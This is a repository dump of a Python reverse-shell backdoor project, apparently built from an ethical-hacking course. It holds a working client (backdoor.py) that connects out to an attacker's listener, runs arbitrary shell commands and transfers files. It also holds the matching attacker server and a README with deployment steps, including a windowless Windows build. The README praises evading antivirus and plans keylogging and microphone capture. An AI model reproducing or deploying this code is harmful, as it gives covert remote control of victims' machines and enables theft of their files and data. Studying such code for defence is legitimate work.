├── .gitignore ├── server.py ├── backdoor.py └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | /venv/ 2 | .idea -------------------------------------------------------------------------------- /server.py: -------------------------------------------------------------------------------- 1 | import os 2 | import socket 3 | import json 4 | 5 | SERVER_IP = '192.168.254.49' # IP of my Kali Linux machine 6 | SERVER_PORT = 5555 7 | 8 | 9 | def reliable_send(data): 10 | json_data = json.dumps(data) 11 | target_sock.send(json_data.encode()) 12 | 13 | 14 | def reliable_recv(): 15 | data = '' 16 | while True: 17 | try: 18 | data = data + target_sock.recv(1024).decode().rstrip() 19 | return json.loads(data) 20 | except ValueError: 21 | continue 22 | 23 | 24 | def upload_file(filename): 25 | file = open(filename, 'rb') 26 | target_sock.send(file.read()) 27 | file.close() 28 | 29 | 30 | def download_file(filename): 31 | file = open(filename, 'wb') 32 | target_sock.settimeout(1) 33 | chunk = target_sock.recv(1024) 34 | while chunk: 35 | file.write(chunk) 36 | try: 37 | chunk = target_sock.recv(1024) 38 | except socket.timeout: 39 | break 40 | target_sock.settimeout(None) 41 | file.close() 42 | 43 | 44 | def target_communication(): 45 | while True: 46 | command = input(f'* Shell~{str(target_ip)}: ') 47 | reliable_send(command) 48 | if command == 'quit': 49 | break 50 | elif command[:3] == 'cd ': 51 | pass 52 | elif command == 'clear': 53 | os.system('clear') 54 | elif command[:9] == 'download ': 55 | download_file(command[9:]) 56 | elif command[:7] == 'upload ': 57 | upload_file(command[7:]) 58 | else: 59 | result = reliable_recv() 60 | print(result) 61 | 62 | 63 | server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 64 | server_sock.bind((SERVER_IP, SERVER_PORT)) 65 | 66 | print('[+] Listening For Incoming Connections') 67 | server_sock.listen(5) 68 | target_sock, target_ip = server_sock.accept() 69 | print(f'[+] Target Connected From: {str(target_ip)}') 70 | 71 | target_communication() 72 | -------------------------------------------------------------------------------- /backdoor.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import json 3 | import time 4 | import subprocess 5 | import os 6 | 7 | SERVER_IP = '192.168.254.49' # IP of my Kali Linux machine 8 | SERVER_PORT = 5555 9 | 10 | 11 | def reliable_send(data): 12 | json_data = json.dumps(data) 13 | target_sock.send(json_data.encode()) 14 | 15 | 16 | def reliable_recv(): 17 | data = '' 18 | while True: 19 | try: 20 | data = data + target_sock.recv(1024).decode().rstrip() 21 | return json.loads(data) 22 | except ValueError: 23 | continue 24 | 25 | 26 | def connection(): 27 | while True: 28 | time.sleep(20) 29 | try: 30 | target_sock.connect((SERVER_IP, SERVER_PORT)) 31 | shell() 32 | target_sock.close() 33 | break 34 | except: 35 | connection() 36 | 37 | 38 | def upload_file(filename): 39 | file = open(filename, 'rb') 40 | target_sock.send(file.read()) 41 | file.close() 42 | 43 | 44 | def download_file(filename): 45 | file = open(filename, 'wb') 46 | target_sock.settimeout(1) 47 | chunk = target_sock.recv(1024) 48 | while chunk: 49 | file.write(chunk) 50 | try: 51 | chunk = target_sock.recv(1024) 52 | except socket.timeout: 53 | break 54 | target_sock.settimeout(None) 55 | file.close() 56 | 57 | 58 | def shell(): 59 | while True: 60 | command = reliable_recv() 61 | if command == 'quit': 62 | break 63 | elif command == 'clear': 64 | pass 65 | elif command[:3] == 'cd ': 66 | os.chdir(command[3:]) 67 | elif command[:9] == 'download ': 68 | upload_file(command[9:]) 69 | elif command[:7] == 'upload ': 70 | download_file(command[7:]) 71 | else: 72 | execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, 73 | stdin=subprocess.PIPE) 74 | result = execute.stdout.read() + execute.stderr.read() 75 | result = result.decode() 76 | reliable_send(result) 77 | 78 | 79 | target_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 80 | connection() 81 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Python Backdoor Coding Project 2 | 3 | ## Description 4 | 5 | This project was created by following a tutorial from a course I found on Udemy: 6 | [Complete Ethical Hacking Bootcamp 2023: Zero to Mastery](https://www.udemy.com/course/complete-ethical-hacking-bootcamp-zero-to-mastery/) 7 | 8 | The course is a comprehensive overview of ethical hacking and penetration testing concepts. 9 | This backdoor project contains two main programs: 10 | 11 | `backdoor.py` - the file that runs on the target machine, the one you want to exploit 12 | 13 | `server.py` - the file that runs on your own machine, the one sending the commands 14 | 15 | These programs will work together to create a reverse TCP connection that allows you to send commands from your machine that the target machine executes, and the target machine sends back the output. 16 | 17 | ### Why Code Our Own Backdoor? 18 | 19 | There are many reasons why it's useful to code our own backdoor program (as opposed to using premade exploits from a framework such as _Metasploit_): 20 | 21 | 1. **Customization** 22 | 23 | By developing your own backdoor, you have complete control over its functionality, features, and behavior. You can adapt it to meet your specific needs and objectives, making it easier to integrate into your existing infrastructure or target environment. 24 | 25 | 2. **Stealth and Evasion** 26 | 27 | Custom backdoors may be harder to detect by antivirus software or intrusion detection systems. By writing your own code, you can implement techniques to evade detection, such as using obfuscation, encryption, or anti-analysis methods. This can increase your chances of successfully infiltrating a target system. 28 | 29 | 3. **Education and Learning** 30 | 31 | When you create your own backdoor from scratch, it provides an excellent opportunity to learn and understand the intricacies of network protocols, security vulnerabilities, and exploit techniques. It allows you to deepen your knowledge of how these systems work and how they can be exploited, which can be valuable for defensive purposes as well. 32 | 33 | 4. **Tailored Exploitation** 34 | 35 | Premade exploits like those in _Metasploit_ often target known vulnerabilities in common software. However, if you encounter a unique or undisclosed vulnerability, coding your own backdoor allows you to specifically target and exploit that particular weakness, which gives you an advantage over other exploits. 36 | 37 | 5. **Adaptability** 38 | 39 | The security landscape is constantly evolving, with new defenses and countermeasures being developed regularly. By coding your own backdoor, you can continuously update and adapt it to bypass emerging security mechanisms. This flexibility can be particularly useful when dealing with hardened or well-protected systems. 40 | 41 | ### Base Functionality 42 | 43 | Once the reverse TCP connection has been created, the attacking machine can send and run any command that the current user on the target machine could run, whether that's on a Windows command prompt or Unix terminal. 44 | 45 | The base functionality of this project is relatively rudimentary. Here is the short list of commands that can be run in addition to the commands that you can naturally run on the target machine: 46 | 47 | * `cd ` - changes the current working directory on the target machine 48 | * `download ` - downloads a file from the target machine to the current working directory on the attacking machine 49 | * `upload ` - uploads a file from the attacking machine to the current working directory on the target machine 50 | * `clear` - clears the terminal 51 | * `quit` - closes the connection and exits both programs 52 | 53 | ### Additional Functionality 54 | 55 | There are a handful of possible features I'd like to add on top of the base program. 56 | 57 | | Feature | Status | Description | 58 | |---------------------|--------|----------------------------------------------------| 59 | | Keylogger | ❌ | Capture and record keystrokes from the target | 60 | | Privilege Elevation | ❌ | Run commands as root on Unix or System on Windows | 61 | | Record Microphone | ❌ | Record voice input from the target (if applicable) | 62 | | Screenshot Desktop | ❌ | Get screen grabs of the target's screen | 63 | 64 | ## Setup and Installation 65 | 66 | 1. Start by cloning the project's repository onto your attacking machine. 67 | 68 | `git clone https://github.com/JaredMHarding/backdoor` 69 | 70 | 2. In both `server.py` and `backdoor.py`, there are two variables called `SERVER_IP` and `SERVER_PORT`. Their default values are based on my personal Kali Linux machine's IP address and port number. **Make sure to update `SERVER_IP` in both files to whatever your attacking machine's IP is**, otherwise the backdoor will not work. `SERVER_PORT` is arbitrary and can remain the same unless there's already another program/service running on the default port. 71 | 72 | 3. If you plan to run `backdoor.py` in a Windows environment, then you will need to compile the program on a Windows machine with Python 3 installed to create an executable file. Copy `backdoor.py` onto the Windows machine, and follow these steps... 73 | 1. Open a command prompt and navigate to the directory where you copied `backdoor.py`. 74 | 2. To compile the program, you will need a Pyinstaller library. If you don't already have Pyinstaller on your machine, use the command `pip install pyinstaller` to install it: 75 | 3. Once Pyinstaller is installed, run this command: 76 | 77 | ```cmd 78 | pyinstaller backdoor.py --onefile --noconsole 79 | ``` 80 | 81 | This will compile the program into an executable file called `backdoor.exe` in a folder named `dist`. You are now ready to run the backdoor. 82 | 83 | If you plan to run the backdoor on a Unix machine, no extra steps are needed, just copy `backdoor.py` onto the target machine. 84 | 85 | 4. You should now be ready to use the backdoor program. Run the server file with `python3 server.py` on your attacking machine, then run the backdoor on the target machine in the directory the backdoor file is in: 86 | - Windows: Run `start backdoor.exe` in the command prompt (or just double-click the file in the file explorer) 87 | - Unix: Run `python3 backdoor.py` in a terminal 88 | 89 | After a short delay, the connection should be created and a shell will appear on your attacking machine's terminal. You should now be able to run any of the commands listed in the functionality sections. 90 | 91 | ## Credits 92 | 93 | The base project was coded by following an online tutorial. I plan to add more functionality to the project over time. 94 | 95 | ### Links 96 | 97 | * [zerotomastery.io](https://zerotomastery.io/) 98 | * Instructors: 99 | * [Andrei Neagoie](https://github.com/aneagoie) (Owner of Zero To Mastery) 100 | * Aleksa Tamburkovski (This project's code was based off of his lesson from the course) --------------------------------------------------------------------------------